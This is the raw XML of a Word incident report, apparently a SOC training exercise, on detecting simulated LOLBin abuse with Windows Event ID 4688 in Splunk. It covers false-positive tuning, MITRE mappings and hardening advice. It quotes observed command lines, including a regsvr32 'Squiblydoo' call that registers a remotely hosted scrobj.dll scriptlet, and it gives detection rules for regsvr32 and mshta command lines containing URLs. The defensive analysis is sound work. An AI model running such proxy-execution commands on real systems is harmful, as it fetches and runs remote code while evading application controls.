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LOLBins &amp; Execution Abuse — Scenario 06</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IR-2026-007</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LOLBins &amp; Execution Abuse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21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E67E22"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">High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T1218.005, T1218.011, T1218.010, T1105</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an attacker who already has a foothold on the system using Living off the Land Binaries (LOLBins) — legitimate, Microsoft-signed Windows binaries — to execute or stage malicious content. Because these binaries are trusted by the OS and most antivirus signature lists, this technique is commonly used to evade detection that relies solely on flagging known-malicious files.</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Attacker uses mshta.exe to execute inline JavaScript (HTA-style execution).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker invokes rundll32.exe with a specific DLL export (Control_RunDLL) to simulate arbitrary code execution via a trusted binary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker attempts regsvr32.exe abuse using the “Squiblydoo” pattern — registering a remotely-hosted scriptlet (scrobj.dll) via a URL, a well-known defense-evasion technique for bypassing application whitelisting.</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mshta.exe executions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Queried Event ID 4688 for rundll32.exe executions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Queried Event ID 4688 for regsvr32.exe executions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Combined all three LOLBins into a single query to view the attack chain chronologically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reviewed rundll32.exe results for false positives and identified legitimate background-task noise from the machine account (JIMIL-JOSHI$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Applied an exclusion filter to separate genuine simulated activity from normal OS behavior.</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300"/>
        <w:gridCol w:w="1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Process</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09:31:14.903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mshta.exe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javascript:alert('LOLBin Simulation Test');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Simulated HTA/script execution (T1218.005)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09:31:23.939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rundll32.exe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shell32.dll,Control_RunDLL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Simulated DLL export execution (T1218.011)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09:31:43.315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regsvr32.exe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 /n /u /i:https://raw.githubusercontent.com scrobj.dll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Squiblydoo remote scriptlet (T1218.010/T1105)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">False Positives Identified: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two additional rundll32.exe events were observed in the same time window, triggered by the JIMIL-JOSHI$ machine account, and were excluded from the final detection set as legitimate Windows background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4200"/>
        <w:gridCol w:w="16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Account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Process</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Classification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JIMIL-JOSHI$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rundll32.exe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C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask</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color w:val="27AE60"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Legitimate (Program Compatibility Assistant)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JIMIL-JOSHI$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rundll32.exe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C:\WINDOWS\system32\AppXDeploymentExtensions.OneCore.dll,ShellRefresh</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color w:val="27AE60"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Legitimate (AppX Deployment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is documented as a key tuning lesson: alerting on the binary name alone produces excessive noise. Reliable detection requires filtering on suspicious arguments, unusual parent processes, or known-malicious DLL/export combinations rather than the presence of the LOLBin itself.</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09:31:14 — mshta.exe executes inline JavaScript (T1218.005)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">09:31:23 — rundll32.exe invoked with Control_RunDLL export (T1218.011)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">09:31:43 — regsvr32.exe attempts remote scriptlet registration — Squiblydoo (T1218.010 / T1105)</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T1218.005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System Binary Proxy Execution: Mshta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Execution / Defense Evasion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T1218.011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System Binary Proxy Execution: Rundll32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Execution / Defense Evasion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T1218.010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System Binary Proxy Execution: Regsvr32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Execution / Defense Evasion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T1105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Ingress Tool Transfer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Command and Control</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detection of three of the most commonly abused LOLBins in real-world attacks, using only native Windows Event ID 4688 logging. The regsvr32.exe Squiblydoo pattern (/i:http(s)://...) is the highest-confidence indicator in this set, since legitimate use of regsvr32 with a remote URL argument is exceptionally rare in normal enterprise activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation also surfaced a realistic and important tuning lesson: rundll32.exe alone is a poor detection trigger due to its constant legitimate use by Windows system services. This mirrors a common SOC L1 challenge — distinguishing attacker LOLBin abuse from background OS noise requires argument-level and context-level filtering, not binary-name matching alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed simulated LOLBin execution abuse — all three techniques successfully detected and differentiated from legitimate system noise.</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source of the mshta.exe, rundll32.exe, and regsvr32.exe executions tied to the hp account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Block outbound network access for regsvr32.exe and mshta.exe via application control policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review for any successfully downloaded/registered remote scriptlets.</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Implement Windows Defender Application Control (WDAC) or AppLocker rules to restrict regsvr32.exe/mshta.exe usage to approved scenarios only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a correlation rule alerting specifically on regsvr32.exe or mshta.exe command lines containing http:// or https://.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude known-legitimate rundll32.exe DLL/export combinations from alerting baselines to reduce noise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Sysmon for richer parent-child process context on LOLBin invocations.</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06 demonstrates detection of Living off the Land Binary abuse — a technique frequently used by real attackers to evade signature-based antivirus detection — using native Windows Event ID 4688 logging in Splunk. The investigation highlights both high-confidence detection patterns (Squiblydoo-style regsvr32 abuse) and a realistic false-positive tuning challenge (rundll32.exe background noise), reflecting the analytical judgment expected of a SOC L1 analyst.</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IR-2026-007 | LOLBins &amp; Execution Abuse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2026-06-21T04:08:37.090Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T04:08:37.104Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>